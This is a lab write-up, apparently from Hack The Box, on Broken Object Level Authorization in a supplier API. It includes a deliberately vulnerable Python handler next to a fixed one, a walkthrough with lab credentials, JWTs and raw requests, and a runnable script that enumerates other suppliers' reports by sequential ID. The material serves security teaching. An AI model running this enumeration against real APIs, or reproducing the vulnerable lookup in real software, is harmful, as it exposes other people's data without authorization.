June 25, 2026
BOLA (Broken Object Level Authorization)
By Ahmed Ali
Broken Object Level Authorization (BOLA) is a critical API security vulnerability ranked API1 in the OWASP API Security Top 10. It occurs when an API accepts a client-supplied object identifier (a user ID, record ID, file name, and so on) and fetches that object without verifying that the authenticated caller is allowed to access it. Authentication and even role checks can all pass; what is missing is the ownership check on the specific object. As a result, attackers can view, modify, or delete data that does not belong to them, leading to unauthorized access and sensitive data exposure.
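As an added example (not code from the original post or from the lab's API), the following pure-Python model contrasts a report lookup that stops at the role check with one that also ties the object to the caller. The supplier ids and report rows are constructed for illustration; the role string is the one that appears later in the post's JWT.

```python
"""
Model of the quarterly-report lookup: a handler that performs only
function-level authorization (the BOLA) next to one that adds the
object-level check. No web framework; all data below is constructed.
"""
from dataclasses import dataclass
from typing import List, Optional, Tuple

ROLE_GET_REPORT_BY_ID = "Suppliers_GetQuarterlyReportByID"   # role name from the lab JWT


@dataclass(frozen=True)
class Supplier:
    id: str                 # caller's supplier id, taken from the validated token
    roles: Tuple[str, ...]  # role claims from the validated token


@dataclass(frozen=True)
class QuarterlyReport:
    id: int                 # sequential integer, as in the lab's API
    supplier_id: str        # owner of the report
    quarter: int
    year: int
    amount_sold: int
    comments_from_manager: str


# Constructed data: report 2 belongs to supplier A, reports 1 and 3 to supplier B.
SUPPLIER_A = Supplier("supplier-a", (ROLE_GET_REPORT_BY_ID,))
SUPPLIER_B = Supplier("supplier-b", (ROLE_GET_REPORT_BY_ID,))
NO_ROLE = Supplier("supplier-c", ())
REPORTS = {
    1: QuarterlyReport(1, "supplier-b", 1, 2023, 5000, "B's Q1 notes"),
    2: QuarterlyReport(2, "supplier-a", 1, 2023, 7000, "A's Q1 notes"),
    3: QuarterlyReport(3, "supplier-b", 2, 2023, 9000, "B's Q2 notes"),
}

Result = Tuple[int, Optional[QuarterlyReport]]   # (HTTP status, body)


def get_report_vulnerable(report_id: int, caller: Supplier) -> Result:
    """Role is checked, object is not: any valid caller can read any report."""
    if ROLE_GET_REPORT_BY_ID not in caller.roles:
        return 403, None
    report = REPORTS.get(report_id)      # lookup by primary key alone: this is the BOLA
    if report is None:
        return 404, None
    return 200, report


def get_report_secure(report_id: int, caller: Supplier) -> Result:
    """Same role check, plus an object-level check tying the report to the caller."""
    if ROLE_GET_REPORT_BY_ID not in caller.roles:
        return 403, None
    report = REPORTS.get(report_id)
    # A report that exists but belongs to someone else is answered with 404,
    # not 403, so the endpoint does not confirm which foreign ids exist.
    if report is None or report.supplier_id != caller.id:
        return 404, None
    return 200, report


def list_own_reports(caller: Supplier) -> List[QuarterlyReport]:
    """The list endpoint, scoped to the caller instead of returning every row."""
    return [r for r in REPORTS.values() if r.supplier_id == caller.id]


if __name__ == "__main__":
    # Supplier A asks for report 1, which belongs to B.
    print("vulnerable:", get_report_vulnerable(1, SUPPLIER_A)[0])   # 200: data leaked
    print("secure:    ", get_report_secure(1, SUPPLIER_A)[0])       # 404: denied
```

The lab's server header is Kestrel, so the real API is ASP.NET Core; the equivalent fix there is to filter the query by the supplier id taken from the validated claims before selecting by report id, rather than selecting by report id and hoping the caller is the owner.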
Hands-On Example
We're given a Swagger UI page for an e-commerce web app with 60+ API endpoints and multiple resources:
1) Log in as a supplier
Use the provided credentials to log in:
- Email: htbpentester2@pentestercompany.com
- Password: HTBPentester2
2) Obtain a JWT
Go to the Authentication resource and send a POST request to:
/api/v1/authentication/suppliers/sign-in
Request:
Response:
After a successful login, the server responds with a JWT token:
{
"jwt": "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0MjE0MCwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ.NvPBf1iR0imuBZyIBGNzhRc4o8g_RJ_wHFaZHrXKA1OJ36V7jHDQB-r9Qxt4QPr4PrT1rGhsbivBAH08sIQn4A"
}
3) Authorize in Swagger UI
In Swagger UI, click the Authorize button (unlock icon indicates you're not authorized yet):
Paste the JWT token and click Authorize:
Once authorization is successful, the icon changes to a lock:
4) Get the current supplier details
Go to the Suppliers resource:
Send a GET request to:
/api/v1/suppliers/current-user
(The lock icon indicates authentication is required.)
Request:
Response:
{
"supplier": {
"id": "781391c3-c6e3-4f42-bea4-1e71b6d9b4e7",
"companyID": "b75a7c76-e149-4ca7-9c55-d9fc4ffa87be",
"name": "HTBPentester2",
"email": "htbpentester2@pentestercompany.com",
"phoneNumber": "+44 9999 999992"
}
}
5) Confirm the BOLA (Broken Object Level Authorization)
There are two relevant endpoints for quarterly reports:
- GET /api/v1/suppliers/quarterly-reports (all reports)
- GET /api/v1/suppliers/quarterly-reports/{ID} (single report)
When we try to fetch all suppliers' quarterly reports, the request is rejected as unauthorized. That matches the role claim in our JWT: decoding its payload shows only SupplierCompanies_GetYearlyReportByID and Suppliers_GetQuarterlyReportByID, and there is no role for the list endpoint, so function-level authorization is doing its job here:
However, GET /api/v1/suppliers/quarterly-reports/{ID} is vulnerable: if we provide an ID that does not belong to our account, the API still returns the report.
Request:
Response:
This confirms a BOLA issue: the endpoint checks that the caller holds the Suppliers_GetQuarterlyReportByID role (function-level authorization) but never checks that the requested report's supplierID matches the authenticated supplier (object-level authorization).
6) Fuzz IDs to enumerate reports
Supplier ids are GUIDs, but report ids are small sequential integers (the response below shows id 8), so they can be enumerated trivially. Send the request to Burp Intruder, mark the ID in the path as the payload position, use a numeric payload list from 1 to 100, and sort the results by status code and response length; every 200 response whose supplierID is not our own is another supplier's report:
Example request/response (report ID 8):
GET /api/v1/suppliers/quarterly-reports/8 HTTP/1.1
Host: 154.57.164.69:30545
Authorization: Bearer eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0NTUyMSwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ._OBQ9wKn_HVCDs4FewLLZvaB08zE4EKhxh_94HxbPvLJBnRgRbgcztr5_lRLC-7MzyD4iq-eu3qmAcWX7kcj0Q
Accept-Language: en-US,en;q=0.9
accept: application/json
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Referer: http://154.57.164.69:30545/swagger/index.html
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Date: Sun, 24 May 2026 17:39:58 GMT
Server: Kestrel
Content-Length: 193

{"supplierQuarterlyReport":{"id":8,"supplierID":"b2d1a1a9-d5bb-4973-bbe4-9a605b6f0da4","quarter":3,"year":2023,"amountSold":10000,"commentsFromManager":"HTB{e76651e1f516eb5d7260621c26754776}"}}
The supplierID in this response (b2d1a1a9-…) is not our own supplier id (781391c3-… from step 4), so this is another supplier's report, returned with nothing more than our own valid token and a guessed integer.
Flag obtained:
HTB{e76651e1f516eb5d7260621c26754776}
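The Intruder run above as a script, added here as an example (not part of the original post): it decodes the role claims from the JWT shown in the post, walks sequential report ids through the by-ID endpoint, and keeps every report whose supplierID is not the caller's own. The fetcher is pluggable, so the enumeration logic runs offline against a constructed stand-in for the lab API; the live fetcher uses only urllib and assumes the lab base URL and token are passed on the command line. Report 8 in the stand-in mirrors the post's response; the other entries are made up.

```python
"""
Script version of the ID enumeration: read the token's claims, then sweep
/api/v1/suppliers/quarterly-reports/{id} and flag reports owned by others.
"""
import base64
import functools
import json
import sys
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Optional, Tuple

ROLE_CLAIM = "http://schemas.microsoft.com/ws/2008/06/identity/claims/role"
NAME_CLAIM = "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier"

# JWT returned by the sign-in step in the post.
PAGE_JWT = "eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9uYW1laWRlbnRpZmllciI6Imh0YnBlbnRlc3RlcjJAcGVudGVzdGVyY29tcGFueS5jb20iLCJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dzLzIwMDgvMDYvaWRlbnRpdHkvY2xhaW1zL3JvbGUiOlsiU3VwcGxpZXJDb21wYW5pZXNfR2V0WWVhcmx5UmVwb3J0QnlJRCIsIlN1cHBsaWVyc19HZXRRdWFydGVybHlSZXBvcnRCeUlEIl0sImV4cCI6MTc3OTY0MjE0MCwiaXNzIjoiaHR0cDovL2FwaS5pbmxhbmVmcmVpZ2h0Lmh0YiIsImF1ZCI6Imh0dHA6Ly9hcGkuaW5sYW5lZnJlaWdodC5odGIifQ.NvPBf1iR0imuBZyIBGNzhRc4o8g_RJ_wHFaZHrXKA1OJ36V7jHDQB-r9Qxt4QPr4PrT1rGhsbivBAH08sIQn4A"
OWN_SUPPLIER_ID = "781391c3-c6e3-4f42-bea4-1e71b6d9b4e7"   # from /suppliers/current-user in the post

Fetch = Callable[[int], Tuple[int, Optional[dict]]]      # report id -> (HTTP status, JSON body or None)


def decode_jwt_claims(token: str) -> dict:
    """Decode the JWT payload WITHOUT verifying the signature. We only read what
    the server already handed us (subject, roles, expiry); this is not an auth check."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)            # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))


def roles_from_claims(claims: dict) -> List[str]:
    """ASP.NET emits a bare string for a single role and a list for several."""
    roles = claims.get(ROLE_CLAIM, [])
    return [roles] if isinstance(roles, str) else list(roles)


def http_fetch_report(base_url: str, token: str, report_id: int) -> Tuple[int, Optional[dict]]:
    """Live fetcher for the lab: GET /api/v1/suppliers/quarterly-reports/{id}."""
    req = urllib.request.Request(
        f"{base_url}/api/v1/suppliers/quarterly-reports/{report_id}",
        headers={"Authorization": f"Bearer {token}", "Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, json.loads(resp.read())
    except urllib.error.HTTPError as err:           # 401/403/404 etc.: not a hit
        return err.code, None


def enumerate_foreign_reports(fetch: Fetch, own_supplier_id: str, ids: Iterable[int]) -> List[dict]:
    """Sweep the ids and return every report that belongs to a different supplier."""
    foreign = []
    for rid in ids:
        status, body = fetch(rid)
        if status != 200 or not body:
            continue
        report = body.get("supplierQuarterlyReport") or {}
        if report.get("supplierID") and report["supplierID"] != own_supplier_id:
            foreign.append(report)
    return foreign


# Constructed stand-in for the lab API so the sweep runs offline. Report 8 mirrors
# the post's response (another supplier's id); 5 is ours; 12 is made up; rest 404.
FAKE_API = {
    5: {"id": 5, "supplierID": OWN_SUPPLIER_ID, "quarter": 1, "year": 2023,
        "amountSold": 4000, "commentsFromManager": "ours (constructed)"},
    8: {"id": 8, "supplierID": "b2d1a1a9-d5bb-4973-bbe4-9a605b6f0da4", "quarter": 3, "year": 2023,
        "amountSold": 10000, "commentsFromManager": "not ours (constructed comment)"},
    12: {"id": 12, "supplierID": "00000000-0000-4000-8000-000000000012", "quarter": 4, "year": 2023,
         "amountSold": 1500, "commentsFromManager": "not ours either (constructed)"},
}


def fake_fetch(report_id: int) -> Tuple[int, Optional[dict]]:
    body = FAKE_API.get(report_id)
    return (200, {"supplierQuarterlyReport": body}) if body else (404, None)


if __name__ == "__main__":
    claims = decode_jwt_claims(PAGE_JWT)
    print("subject:", claims[NAME_CLAIM], "roles:", roles_from_claims(claims))
    if len(sys.argv) == 3:      # python bola_enum.py http://HOST:PORT <jwt>   (live run against the lab)
        fetch: Fetch = functools.partial(http_fetch_report, sys.argv[1], sys.argv[2])
    else:
        fetch = fake_fetch      # offline demo against the constructed stand-in
    for r in enumerate_foreign_reports(fetch, OWN_SUPPLIER_ID, range(1, 101)):
        print(f"id={r['id']} supplierID={r['supplierID']} comments={r['commentsFromManager']!r}")
```

Run it with no arguments to see the sweep against the stand-in, or with the lab URL and a fresh token to reproduce the Intruder results; the token printed first is only decoded, never verified, which is all a client needs to see which function-level roles it was granted.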